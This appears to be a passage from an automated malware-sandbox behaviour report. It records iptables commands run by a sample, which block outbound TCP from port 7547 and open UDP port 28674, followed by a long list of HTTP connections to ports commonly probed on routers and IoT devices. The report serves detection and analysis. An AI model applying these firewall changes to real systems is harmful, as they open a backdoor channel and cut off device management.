                            Source: /bin/sh (PID: 6436)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6456)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6459)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6462)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6465)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6468)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28674 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6474)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28674 -j ACCEPTJump to behavior
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44588 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46640 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43658 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42464 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36258 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56236 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46270 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42906 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54856 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47372 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56902 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58104 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38218 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41536 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57776 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39032 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44088 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58972 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59284 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33870 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45240 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42514 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38010 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44012 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46432 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53212 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60742 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47894 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58940 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33058 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44964 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33172 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38760 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55892 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48218 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38550 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48516 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42356 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53920 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60138 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56074 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52520 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54080 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34896 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53648 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45404 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55402 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46252 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43262 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42856 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60024 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37314 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54132 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56900 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44034 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57728 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43774 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52258 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52166 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46134 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33290 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47656 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45000 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47902 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41384 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53088 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56578 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48258 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39770 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39032 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57932 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54190 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35932 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51066 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54874 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44164 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38868 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40430 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46876 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56378 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39970 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33526 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48844 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42984 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57916 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35372 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33418 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38328 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37372 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55636 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43142 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37428 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40896 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33286 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40994 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59632 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46306 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44502 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37644 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37622 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36822 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47802 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53804 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43102 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33050 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44416 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55112 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54226 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45340 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60746 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34276 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55062 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36032 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53736 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58394 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53144 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58366 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43632 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38888 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35100 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43678 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39344 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51818 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40432 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35642 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44648 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60892 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44506 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34732 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48460 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57210 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59820 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45100 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42212 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35700 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36728 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49424 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39332 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34198 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33070 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33420 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45430 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47912 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54536 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50832 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59620 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35390 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59778 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60738 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45496 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43780 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42766 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46800 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39358 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43712 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54614 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43036 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44084 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40594 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43522 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34386 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44878 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34398 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43264 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53016 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48472 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46460 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43570 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53070 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33282 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56370 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54622 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36022 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40310 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55104 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59994 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38878 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58554 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43964 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58830 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38672 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43906 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40118 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55826 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58080 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43052 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52260 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53504 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60212 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47490 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44680 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33010 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34624 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47318 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49140 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34124 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43744 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33794 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60022 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35080 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53870 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38240 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34410 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36330 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53422 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32998 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57580 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54212 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43310 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40350 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47940 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48320 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56468 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54848 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34148 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33242 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55704 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57986 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56624 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46816 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35852 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44556 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43350 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37798 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39746 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45444 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40894 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51254 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37160 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35160 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58566 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43850 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42008 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52562 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54514 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48006 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59508 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54706 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43064 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32890 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56132 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48988 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33688 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48784 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40274 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33902 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51794 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42406 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43336 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53990 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60028 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42368 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51602 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54676 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51234 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58670 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37748 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54904 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55108 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46472 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47524 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47950 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55802 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36440 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48208 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48384 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55342 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45408 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60762 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59042 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46754 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54796 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53990 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36566 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48442 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40862 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44498 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59862 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35320 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55232 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 7574
